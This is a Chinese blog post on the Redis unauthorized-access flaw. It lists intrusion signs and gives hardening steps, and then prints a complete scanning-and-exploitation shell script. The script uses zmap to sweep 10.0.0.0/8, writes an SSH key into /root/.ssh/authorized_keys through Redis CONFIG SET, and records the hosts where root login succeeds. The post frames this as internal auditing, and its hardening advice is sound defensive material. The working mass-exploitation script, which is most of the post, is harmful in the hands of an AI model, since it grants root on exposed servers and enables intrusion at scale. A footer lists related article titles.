一、前言

前段时间,在做内网影响程度评估的时候写了扫描利用小脚本,
扫描后统计发现,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的
考虑到本社区大部分开发者都会使用redis,特此分享下以便大家可以对自己公司的内网进行一个排查。

二、漏洞介绍

Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。

入侵特征:

  1. Redis 可能执行过 FLUSHALL 方法,整个 Redis 数据库被清空
  2. 在 Redis 数据库中新建了一个名为 crackit(网上流传的命令指令) 的键值对,内容为一个 SSH 公钥。
  3. 在 /root/.ssh 文件夹下新建或者修改了 authorized_keys 文件,内容为 Redis 生成的 db 文件,包含上述公钥

三、修复建议

1.禁止一些高危命令

修改 redis.conf 文件,添加

rename-command FLUSHALL ""

rename-command CONFIG   ""

rename-command EVAL     ""

来禁用远程修改 DB 文件地址

2.以低权限运行 Redis 服务

为 Redis 服务创建单独的用户和家目录,并且配置禁止登陆

3.为 Redis 添加密码验证

修改 redis.conf 文件,添加

requirepass mypassword

4.禁止外网访问 Redis

修改 redis.conf 文件,添加或修改

bind 127.0.0.1

使得 Redis 服务只在当前主机可用

四、扫描工具

1 使用说明

    #以Ubuntu为例

    su

    # Requirements

    apt-get install redis-server expect zmap

    git clone https://github.com/qingxp9/yyfexploit

    cd yyfexploit/redis

    # 扫描6379端口

    # 如果你要扫内网,把/etc/zmap/zmap.conf中blacklist-file这一行注释掉

    zmap -p 6379 10.0.0.0/8 -B 10M -o ip.txt

    # Usage

    ./redis.sh ip.txt

最后,将会生成几个txt文件记录结果
其中:
runasroot.txt 表示redis无认证,且以root运行
noauth.txt 表示redis无认证,但以普通用户运行
rootshell.txt 已写入公钥,可直接以证书登录root用户

像这样:

ssh -i id_rsa root@x.x.x.x

2 工具源代码

就贴下代码吧,各位大牛请在家长陪同下观看

   #!/bin/sh

    if [ $# -eq 1  ]

    then

      ip_list=$1

      ##create id_rsa

      echo "****************************************Create id_rsa file"

      expect -c "

        spawn ssh-keygen -t rsa -f id_rsa -C \"yyf\"

        expect {

            \"*passphrase): \" {

                exp_send \"\r\"

                exp_continue

            }

            \"*again: \" {

                exp_send \"\r\"

            }

            \"*y/n)? \" {

                exp_send \"n\r\"

            }

        }

        expect eof

      "

      echo "\n\n****************************************Attack Targets"

      touch noauth.txt runasroot.txt rootshell.txt haveauth.txt

      i=0

      cat $ip_list | while read ip

      do

        i=`expr $i + 1`;

        #write id_rsa.pub to remote

        echo "*****${i}***connect to remote ${ip} redis "

        expect -c "

          set timeout 3

          spawn redis-cli -h $ip config set dir /root/.ssh/

          expect {

            \"OK\"                        { exit 0 }

            \"ERR Changing directory: Permission denied\"         { exit 1 }

            timeout                       { exit 2 }

            \"(error) NOAUTH Authentication required\"         { exit 3 }

          }

        "

        case $? in

            0)  echo "run redis as root"

                echo $ip >> noauth.txt

                echo $ip >> runasroot.txt

            ;;

            1)  echo "not run redis as root\n\n\n"

                echo $ip >> noauth.txt

                continue

            ;;

            2)  echo "connect timeout\n\n\n"

                continue

            ;;

            3)  echo "Have Auth\n\n\n"

                echo $ip >> haveauth.txt

                continue

            ;;

        esac

        (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

        cat foo.txt | redis-cli -h $ip -x set 1

        redis-cli -h $ip config set dir /root/.ssh/

        redis-cli -h $ip config set dbfilename "authorized_keys"

        redis-cli save

        #login test

        echo "#try to login"

        expect -c "

          set timeout 5

          spawn ssh -i id_rsa root@$ip echo \"yyf\"

          expect {

            \"*yes/no\"     { send \"yes\n\"}

            \"*password\"   { send \"\003\"; exit 1 }

            \"yyf\"         { exit 0 }

            timeout         { exit 2 }

          }

          exit 4

        "

        exitcode=$?

        if [ $exitcode -eq 0 ]

        then

          echo "---------------${ip} is get root shell"

          echo $ip >> rootshell.txt

        fi

        echo "\n\n\n"

      done

      echo "##########Final Count##########"

      wc -l $ip_list

      echo "----------"

      wc -l noauth.txt

      wc -l runasroot.txt

      wc -l rootshell.txt

      echo "----------"

      wc -l haveauth.txt

    else

      echo "usage: ./redis.sh ip.txt"

    fi

redis入侵的更多相关文章

  1. redis入侵小结

    redis安装: windows安装包:http://pan.baidu.com/s/1i3jLlC5 下载下来之后,开始安装: redis-server.exe redis.conf: 简单一步,安 ...

  2. redis 未授权漏洞利用直接登录服务器

    在没有查到杀手之前我是先把带宽&端口用iptables 做了限制这样能保证我能远程操作服务器才能查找原因 2 在各种netstat –ntlp  的查看下没有任何异常 在top 下查到了有异常 ...

  3. linux上redis安装配置及其防漏洞配置及其攻击方法

    Linux上redis安装: 需先在服务器上安装yum(虚拟机可使用挂载的方式安装) 安装配置所需要的环境运行指令:  yum -y install gcc 进入解压文件执行make 指令进行编译 执 ...

  4. 阿里云被挖矿使用,导致cpu长期处于100%,ddgs进程,xWx3T进程,关于redis密码

    1.使用top命令,查看到一个叫xWx3T的进程cpu占用99.8%,由于我的阿里云是单核的,所以最高只能100%. 把它用kill命令杀死后,过一会儿又启动了,又占用100%. 使用ps -ef可以 ...

  5. 一次腾讯云centos服务器被入侵的处理

    昨天一大早,我还没到公司呢,就收到腾讯云安全中心发来的服务器异常登录告警,登录控制台一看,ip还是美国的,一脸懵逼.由于本人之前也没有过处理服务器入侵的经验,而且这台服务器目前还没有部署商用系统,所以 ...

  6. UCloud-201809-001:Redis服务未授权访问漏洞安全预警

    UCloud-201809-001:Redis服务未授权访问漏洞安全预警 尊敬的UCloud用户,您好! 发布时间  2018-09-11更新时间  2018-09-11漏洞等级  HighCVE编号 ...

  7. SSRF打内网redis

    0x00 redis基础 REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统.Redis是一个开源的使用AN ...

  8. 基于ssh,shell,python,iptables,fabric,supervisor和模板文件的多服务器配置管理

     前言:略 新服务器:NS   主服务器:OS 一:OS上新建模板目录例如 mkdir bright 用于导入一些不方便在远程修改的配置文件.redis.conf等,到需要配置的步骤时用远程cp命令覆 ...

  9. Redis CrackIT 入侵事件引发Linux 沦陷

    ▲针对全球6379端口的redis服务器做了扫描,结果如上图 如图开放在公网的redis的6379端口的ip总数有63443个.无密码认证的IP有43024个,在总数占比里达到67%.发现遭受到red ...

随机推荐

  1. MySQL数据库基本指令

    对MySQL的指令不太熟悉,在此特别整理了一下一些常用的指令: 约定:大写字母写SQL关键字和函数名,小写字母写数据库.数据表和数据列的名字.(下述代码更新不同步,部分代码未依据此约定) 1 数据库的 ...

  2. Js分页插件,支持页面跳转

    这里先给出API: 你只需要提供一个对象涉及以下几项属性,你来设置属性值,通过jq对象链式调用page()以参数形式来加载这个对象,按照参数要求会自动生成分页功能, 参数中pageEvent是可以让你 ...

  3. SQL server 视图、范式

    视图 1.视图的概述       视图其实就是一条查询sql语句,用于显示一个或多个表或其他视图中的相关数据.视图将一个查询的结果作为一个表来使用,因此视图可以被看作是存储的查询 或一个虚拟表.视图来 ...

  4. BizTalk开发系列(五) 属性字段

    在根据消息内容进行路由的时候经常使用的是可分辨字段和属性字段.属性字段可以在各个 BizTalk Server 组件(包括管道和业务流程)中进行访问.属性字段还可用于消息路由.如果需要在上下文(而不是 ...

  5. 一个简单驱动的makefile

    KVERS = $(shell uname -r) #Kernel modulesobj-m += hello.o build: kernel_modules kernel_modules: make ...

  6. Leetcode | Linked List Cycle I && II

    一.判断链表是否存在环,办法为: 设置两个指针(fast, slow),初始值都指向头,slow每次前进一步,fast每次前进二步,如果链表存在环,则fast必定先进入环,而slow后进入环,两个指针 ...

  7. canvas的默认尺寸

    canvas一直就是偶尔看看,随便画点小东西,没有认真琢磨过,今天打算认真的从头学一下,画线的时候感觉坐标不太正常,后来发现,canvas有自己的默认尺寸 写法如下 <canvas id=&qu ...

  8. GDC2016 执着于光影表现的【全境封锁】的开放世界渲染

    执着于光影表现[全境封锁]的开放世界渲染 Snowdrop(雪莲花)引擎的全局照明技术介绍   补上原文链接:http://game.watch.impress.co.jp/docs/news/201 ...

  9. php如何遍历多维的stdClass Object 对象,php的转换成数组的函数只能转换外面一丛数组

    php如何遍历多维的stdClass Object 对象,php的转换成数组的函数只能转换外面一丛数组 (2012-09-10 19:58:49) 标签: 杂谈 分类: 网页基础知识 php如何遍历多 ...

  10. Yii源码阅读笔记(二十四)

    Module类中获取子模块,注册子模块,实例化控制器,根据路由运行指定控制器方法的注释: /** * Retrieves the child module of the specified ID. * ...